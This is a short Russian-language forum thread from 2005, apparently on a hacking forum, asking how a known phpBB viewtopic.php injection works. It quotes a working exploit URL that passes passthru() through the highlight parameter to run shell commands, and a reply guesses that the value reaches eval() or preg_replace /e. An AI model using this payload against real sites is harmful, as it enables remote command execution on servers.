PHP-injection (phpbb)

Discussion in 'PHP' started by Майор, 6 Aug 2005.

  1. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    Code:
    viewtopic.php?t=243&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'
    Мне стало интересно где/как происходит иньекция, но просмотрев исходники я так и не понял как это происходит=(((, просьба к грамотным людям подсказать

    viewtopic.php
     
    #1 Майор, 6 Aug 2005
  2. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    СекЛаб почитай,там описывается...
     
    #2 qBiN, 6 Aug 2005
  3. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    ok, Спасибо :)
    закрывайте тему
     
    #3 Майор, 6 Aug 2005
  4. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    Я не смотрел в код, но похоже, что значение highlight или то что от него осталось после неких операций над ним скрипта, заносится в eval(); или в preg_replace() с модификатором /e
     
    #4 Zadoxlik, 6 Aug 2005
  5. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Вроде это и написано на секлабе :)
     
    #5 qBiN, 6 Aug 2005
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.